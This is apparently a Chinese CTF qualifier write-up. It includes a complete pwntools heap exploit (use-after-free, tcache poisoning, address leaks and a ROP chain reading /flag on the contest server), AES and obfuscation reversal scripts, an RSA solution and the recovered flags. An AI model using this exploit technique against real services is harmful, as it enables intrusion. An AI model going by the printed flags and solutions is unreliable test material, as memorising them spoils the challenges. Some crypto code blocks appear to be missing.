今天上午初赛结束了,感谢两个队友带,dr0n和Rot-will
槽点有点多,比如几个题AI秒出,我觉得以后出题都要反AI了,可能就留一个签到题AI能做,如果反AI,可能我真啥都不会了
AI这东西做逆向和密码非常厉害,逆向读伪代码和分析加解密,而这正是LLMs擅长的理解能力。做Web和Misc不太行,因为这两个用到的工具和环境太多。
两个WEB都是平平无奇登陆框,都做不出来,给的hint也做不出来,但是闲鱼一把梭。。。
两个杂项也古怪,队友做麻了,什么二维码小点点、博多密码,rgb转换之类
还有,我们做完4题已经第三名了,其他实在做不出来,就算其他队伍跟我们做一样的题,我们有前三血,那也应该排前面
但是最后三十分钟,我们连掉三十多名,我刷新一下掉一名,他们全都爆发了,不过应该能进决赛
部分附件在:https://github.com/TajangSec/Ningbo-8th-CSC-Pre
PWN
entity_cache
存在uaf
python
1from pwn import *
2import LibcSearcher
3def add(ind,size,data=b'\n'):
4 p.sendlineafter(b'Code: ',b'1')
5 p.sendlineafter(b'id >',str(ind).encode())
6 p.sendlineafter(b'size >',str(size).encode())
7 p.sendafter(b'fragment >',data)
8
9def edit(ind,data):
10 p.sendlineafter(b'Code: ',b'2')
11 p.sendlineafter(b'id >',str(ind).encode())
12 p.sendafter(b'stream >',data)
13
14def free(ind):
15 p.sendlineafter(b'Code: ',b'3')
16 p.sendlineafter(b'id >',str(ind).encode())
17
18def show(ind):
19 p.sendlineafter(b'Code: ',b'4')
20 p.sendlineafter(b'id > ',str(ind).encode())
21
22
23#p=process('entity_cache')
24p=remote('139.155.126.78','26428')
25p.readuntil('[DEBUG INFO]')
26e=ELF('./entity_cache')
27libc=ELF('./libc.so')
28e.address=int(p.readline(),16)-0xa1a
29print(hex(e.address))
30
31syscall=e.address+0xbcc
32add(0,0xf0)
33add(1,0xf0)
34add(2,0xf0,'flag')
35add(3,0xf0,'/flag')
36free(0)
37free(1)
38show(1)
39heap0=u64(p.readuntil('\n',drop=1).ljust(8,b'\x00'))
40print(hex(heap0))
41heap3=heap0+0x100*3
42heap2=heap0+0x100*2
43
44edit(1,p64(e.address+0x202060))
45add(4,0xf0)
46add(5,0xf0) # cache
47edit(5,p64(e.got['puts']))
48show(0)
49puts=u64(p.readuntil('\n',drop=1).ljust(8,b'\x00'))
50print(hex(puts))
51libc.address=puts-libc.symbols['puts']
52env=libc.symbols['environ']
53
54edit(5,p64(env))
55show(0)
56stack=u64(p.readuntil('\n',drop=1).ljust(8,b'\x00')[:8])
57print(hex(stack))
58edit(5,p64(stack-0x120+8*2))
59show(0)
60stack1=u64(p.readuntil('\n',drop=1).ljust(8,b'\x00')[:8])
61print(hex(stack1))
62
63
64main_stack=stack-0x120+8*2
65edit(5,p64(main_stack))
66#gdb.attach(p)
67pause()
68
69rdi=0x000000000002164f+libc.address
70rsi=0x0000000000023a6a+libc.address
71rdx=0x0000000000001b96+libc.address
72rax=0x000000000001b500+libc.address
73payload=b""
74payload=p64(rax)+p64(2)+p64(rdi)+p64(heap3)+p64(rsi)+p64(0)+p64(rdx)+p64(0)+p64(syscall)
75payload+=p64(rax)+p64(0)+p64(rdi)+p64(3)+p64(rsi)+p64(heap2)+p64(rdx)+p64(0x50)+p64(syscall)
76payload+=p64(rax)+p64(1)+p64(rdi)+p64(1)+p64(rsi)+p64(heap2)+p64(rdx)+p64(0x50)+p64(syscall)
77print(hex(len(payload)))
78edit(0,payload)
79
80p.interactive()REVERSE
SEA_1
我不太会逆向,AI告诉我这是AES_ECB
其他选手说,贴在claude desktop或者vscode 的mcp里面,AI秒出,自己根本不用动
伪代码:
c
1int __cdecl main(int argc, const char **argv, const char **envp)
2{
3 size_t i; // [esp+190h] [ebp-268h]
4 int v5[72]; // [esp+19Ch] [ebp-25Ch] BYREF
5 char v6[44]; // [esp+2BCh] [ebp-13Ch] BYREF
6 char Buf1[136]; // [esp+2E8h] [ebp-110h] BYREF
7 char Str[132]; // [esp+370h] [ebp-88h] BYREF
8
9 __CheckForDebuggerJustMyCode(&unk_45A019);
10 memset(Str, 0, 0x80u);
11 memset(Buf1, 0, 0x80u);
12 sub_401E00("Please input the flag and I will verify it: ");
13 sub_401E70("%128s", Str);
14 strcpy(v6, "58453eec4d16ae234a10b597dfe1f6a6");
15 if ( sub_4016B0(v5, v6, 256) )
16 return -1;
17 for ( i = 0; i < strlen(Str); i += 16 )
18 {
19 if ( sub_401410((int)v5, (int)&Buf1[i], &Str[i]) )
20 return -1;
21 }
22 if ( !memcmp(Buf1, &unk_458014, 0x30u) )
23 sub_401E00("Right flag!\n");
24 else
25 sub_401E00("Wrong flag\n");
26 return 0;
27}AES加密,密钥是58453eec4d16ae234a10b597dfe1f6a6,密文是unk_458014,dump出来是29708f1980cce40f46abac148d488ca83716fe1d397202797b1999166265623e8f761285cb28e256b381167761e41094
cyberchef解开:DASCTF{75aab2560274ae21aa4554b993e658d1}
flower_world
txt
1 97704D -= 120;
2 977070 ^= 0x4Fu;
3 977055 -= 30;
4 977064 -= 93;
5 977048 += 95;
6 97704A += 103;
7 97705C ^= 0x82u;
8 977069 += 52;
9 97705E ^= 3u;
10 977041 += 71;
11 977076 ^= 0xE0u;
12 97706D -= 44;
13 977044 -= 127;
14 977075 -= 71;
15 977060 ^= 0xAAu;
16 97704E -= 119;
17 977062 ^= 0xAu;
18 97707D -= 48;
19 977075 += 55;
20 97705B += 111;
21 97706E ^= 0x32u;
22 97706C -= 92;
23 97705F ^= 0x29u;
24 977041 += 79;
25 97704A += 58;
26 977062 -= 17;
27 97705A += 123;
28 977075 -= 100;
29 97705C -= 64;
30 977056 -= 89;
31 977070 ^= 0x73u;
32 977062 ^= 0x61u;
33 97706E += 118;
34 977062 += 41;
35 977070 += 78;
36 977055 -= 11;
37 97704F ^= 0x5Eu;
38 977070 ^= 0xB2u;
39 977066 -= 66;
40 977046 ^= 0xECu;
41 977062 ^= 0xD1u;
42 977046 -= 99;
43 977069 -= 49;
44 977046 += 32;
45 977066 += 61;
46 977042 ^= 0x42u;
47 977055 += 109;
48 977070 += 14;
49 97707B -= 52;
50 97706E -= 94;
51 977074 += 57;
52 97705D -= 30;
53 97705E -= 107;
54 977048 += 55;
55 97704C -= 27;
56 97706F -= 88;
57 97707A -= 105;
58 977040 += 25;
59 97704C += 73;
60 97706F -= 80;
61 977070 += 125;
62 97706E -= 44;
63 97707A += 11;
64 977068 ^= 0x57u;
65 977062 += 117;
66 977056 += 92;
67 97705B ^= 0x7Au;
68 977043 += 33;
69 977045 ^= 0xC3u;
70 97705E += 19;
71 977064 -= 46;
72 977065 -= 45;
73 977067 ^= 0xB0u;
74 97704F -= 69;
75 977061 ^= 0xDCu;
76 977046 += 69;
77 97707E += 116;
78 97704B ^= 0x22u;
79 977063 ^= 0x7Eu;
80 977054 += 18;
81 977072 -= 11;
82 97704E ^= 5u;
83 97706E += 58;
84 977048 += 44;
85 97706D ^= 0xE4u;
86 977068 -= 30;
87 977063 += 96;
88 977047 -= 49;
89 977062 += 83;
90 97707A += 53;
91 97706A ^= 0x21u;
92 97707C += 49;
93 97705B += 11;
94 977070 -= 105;
95 977063 -= 47;
96 977073 -= 67;
97 977047 += 94;
98 97707E += 78;
99 97704F -= 96;
100 97707A ^= 0xD3u;
101 977043 += 115;
102 97705E -= 127;
103 97707A -= 86;
104 977074 += 32;
105 977067 ^= 0x5Cu;
106 977049 -= 64;
107 97706B ^= 0x8Eu;
108 97707E += 121;
109 977054 -= 98;
110 977074 ^= 0x22u;
111 97704F -= 12;
112 977045 ^= 0x2Du;
113 97707C -= 44;
114 97704D -= 74;
115 977061 ^= 0x82u;
116 977068 ^= 0xEDu;
117 977071 ^= 0xBEu;
118 977077 += 4;
119 97705E -= 120;
120 97704B += 67;
121 977072 -= 52;
122 977042 ^= 0x87u;
123 977067 -= 38;
124 97707B ^= 0xFAu;
125 977072 += 90;
126 97706E -= 9;
127 977077 ^= 0x2Fu;
128 977049 += 83;
129 97706B ^= 0xD6u;
130 977062 -= 6;
131 977048 -= 119;
132 977061 -= 118;
133 977062 -= 75;
134 977068 -= 52;
135 977040 -= 108;
136 97706A += 28;
137 97707C ^= 0x4Cu;
138 97706C ^= 0x4Au;
139 977061 ^= 0xFDu;
140 977063 += 125;
141 977041 ^= 0x6Cu;
142 977075 += 25;
143 977071 -= 7;
144 97707D -= 119;
145 97706F -= 16;
146 977064 += 53;
147 977066 ^= 0x56u;
148 977042 ^= 0xF2u;
149 97706B += 115;
150 977055 -= 37;
151 977072 -= 51;
152 977041 -= 107;
153 97704F -= 116;
154 97705C += 46;
155 977065 -= 67;
156 97704C += 113;
157 977061 += 114;
158 97704E += 69;
159 977060 += 99;
160 977064 ^= 0x88u;
161 977079 -= 37;
162 97705E ^= 0x76u;
163 977070 += 95;
164 97707A += 51;
165 977074 ^= 0xD3u;
166 97704F -= 86;
167 977040 -= 6;
168 97707C -= 8;
169 977071 ^= 0x30u;
170 97705B += 29;
171 977070 += 65;
172 97705D ^= 0xEEu;
173 977047 -= 31;
174 977061 -= 16;
175 977071 += 9;
176 977064 -= 46;
177 977049 ^= 0xDEu;
178 977054 ^= 0x6Du;
179 977065 -= 91;
180 977077 += 119;
181 97707D -= 8;
182 --977061;
183 977075 += 124;
184 977068 += 3;
185 977059 -= 22;
186 977060 ^= 0xD3u;
187 977072 ^= 0xA4u;
188 977040 ^= 0xA8u;
189 97707F += 50;
190 97707E ^= 0x4Du;
191 977070 += 60;
192 97704B += 49;
193 97707B += 3;
194 97706A -= 20;
195 977060 -= 38;
196 977063 -= 2;
197 97707B -= 108;
198 97707E -= 71;
199 97706E += 111;
200 977040 ^= 0xD9u;
201 97704E += 76;
202 97706F ^= 0xF6u;
203 97705B += 26;
204 977040 -= 27;
205 977060 -= 80;
206 977078 -= 27;
207 97705B += 7;
208 ++977073;
209 977075 ^= 0xDDu;
210 977043 -= 127;
211 977072 += 116;
212 977069 -= 70;
213 977065 ^= 0x9Bu;
214 977059 -= 34;
215 97704B -= 127;
216 97707F ^= 0xBu;
217 977058 -= 65;
218 97704B ^= 0x83u;
219 977059 ^= 0xB6u;
220 977067 -= 25;
221 977042 -= 94;
222 977061 ^= 0x7Eu;
223 977072 -= 69;
224 977077 -= 72;
225 977060 ^= 0xF7u;
226 977043 -= 11;
227 977069 ^= 0x64u;
228 977075 ^= 0xEu;
229 977073 -= 111;
230 977065 ^= 0x7Au;
231 97706B -= 7;
232 977060 += 103;
233 97707D ^= 0xF4u;
234 977077 += 16;
235 97705C ^= 0x89u;
236 977041 -= 20;
237 97707A ^= 0x3Fu;
238 97704D -= 31;
239 977073 += 98;
240 977073 -= 5;
241 977061 -= 30;
242 97704C += 73;
243 977054 -= 6;
244 977071 ^= 0x56u;
245 97705B ^= 3u;
246 977055 -= 119;
247 97706D += 37;
248 97705E += 4;
249 977044 -= 48;
250 977076 ^= 0xF4u;
251 977053 ^= 0x10u;
252 977059 ^= 0x47u;
253 977060 ^= 0xE2u;
254 97704E -= 16;
255 97705E ^= 0xD2u;
256 977042 += 70;
257 977060 -= 91;
258 977041 ^= 0x12u;
259 977042 -= 81;
260 977047 += 92;
261 977055 -= 77;
262 97705D ^= 0x7Du;
263 977070 ^= 0x4Au;
264 977074 -= 25;
265 977074 -= 127;
266 97704B += 121;
267 97706C += 64;
268 97707A ^= 0x58u;
269 97704B -= 123;
270 977078 += 42;
271 977071 -= 89;
272 97707E ^= 0x99u;
273 977043 -= 6;
274 977045 ^= 0x7Du;
275 977042 -= 14;
276 977064 += 96;
277 977058 += 26;
278 97706E += 54;
279 977052 -= 86;
280 97705D ^= 0x4Eu;
281 977055 -= 15;
282 977078 -= 32;
283 977057 += 75;
284 97706E += 66;
285 977053 += 101;
286 97705E -= 59;
287 97706B ^= 0xFAu;
288 977042 += 93;
289 977073 -= 123;
290 97707C += 31;
291 977064 ^= 0xA2u;
292 977073 -= 32;
293 97705A ^= 0x11u;
294 97707D += 121;
295 977074 -= 99;
296 977054 ^= 0x68u;
297 97706D -= 75;
298 977041 -= 117;
299 977043 += 92;
300 977041 += 88;
301 97704D -= 4;
302 977052 ^= 0x43u;
303 97704B += 8;
304 97706A -= 82;
305 977055 += 56;
306 977049 += 43;
307 977075 ^= 0xD1u;
308 97705D ^= 0x1Bu;
309 977052 -= 74;
310 97707B -= 104;
311 977073 -= 6;
312 977053 -= 120;
313 977043 -= 6;
314 977069 -= 2;
315 97705E ^= 0xFEu;
316 97707E ^= 0x45u;
317 977052 += 5;
318 977068 ^= 0x36u;
319 977051 -= 42;
320 977050 ^= 0xD6u;
shell
1d=open('1.txt').read().splitlines()
2data=[ 0x7F, 0x11, 0x4A, 0x9D, 0xA5, 0xD5, 0x99, 0x9F, 0xAC, 0xD3,
3 0xD4, 0xBC, 0x1A, 0x53, 0x46, 0xF4, 0xE7, 0x37, 0x03, 0x60,
4 0x17, 0xBA, 0x67, 0xAC, 0x09, 0xDA, 0xA0, 0xFB, 0x2D, 0x8E,
5 0xCB, 0x11, 0x02, 0xC4, 0x17, 0xF7, 0x1B, 0x8F, 0x67, 0x52]
6e={}
7base=0x977040
8def parse_int(s):
9 if '0x' in s:
10 return int(s,16)
11 else:
12 return int(s)
13for i in d:
14 i=i.strip().strip(';')
15
16 if '-' in i:
17 if ('--' in i):
18 value=1
19 addr=int(i.strip('-'),16)-base
20 else:
21 value=parse_int(i.split('-=')[1].strip(';u'))
22 addr=int(i.split()[0],16)-base
23 state=0
24 elif '^' in i:
25 value=parse_int(i.split('^=')[1].strip(';u'))
26 addr=int(i.split()[0],16)-base
27 state=1
28 elif '+' in i:
29 if ('++' in i):
30 value=1
31 addr=int(i.strip('+'),16)-base
32 else:
33 value=parse_int(i.split('+=')[1].strip(';u'))
34 addr=int(i.split()[0],16)-base
35 state=2
36 else:
37 continue
38 if (e.get(addr)==None):
39 e[addr]=[]
40 e[addr].append((state,value))
41
42print(e[0])
43for i in e:
44 if i>=len(data):
45 continue
46 for state,value in e[i][::-1]:
47 # print(state,value)
48 if state==0:
49 data[i]+=value
50 elif state==1:
51 data[i]^=value
52 elif state==2:
53 data[i]-=value
54 data[i]=data[i]&0xff
55print(bytes(data))CRYPTO
Three-prime RSA
https://chatgpt.com/share/68a14d43-ab10-800b-bbee-7e4511dfaaea
AI太猛了
从 r_cubed 恢复 r
r = int(round(r_cubed ** (1/3)))
从 D 中恢复 (p+q+r) 和 random_num
题目中 random_num 是一个 28 位质数,p+q+r 大约 512~514 位。因为 (p+q+r)*random_num < n,所以 D 没有取模的影响:
python
求p+q
p_plus_q = s - r
解一元二次方程得到 p 和 q
方程:x^2 - (p+q)x + p*q = 0
py
1from sympy import symbols, solve
2x = symbols('x')
3sols = solve(x**2 - p_plus_q*x + pq, x)
4p, q = int(sols[0]), int(sols[1])计算 d 并解密
py
1from Crypto.Util.number import long_to_bytes, inverse
2e = 65537
3d = inverse(e, (p-1)*(q-1)*(r-1))
4m = pow(c, d, n)
5flag = long_to_bytes(m)
6print(flag)DASCTF{5521a971-9bed-11ef-bfda-14ac6024b6a8}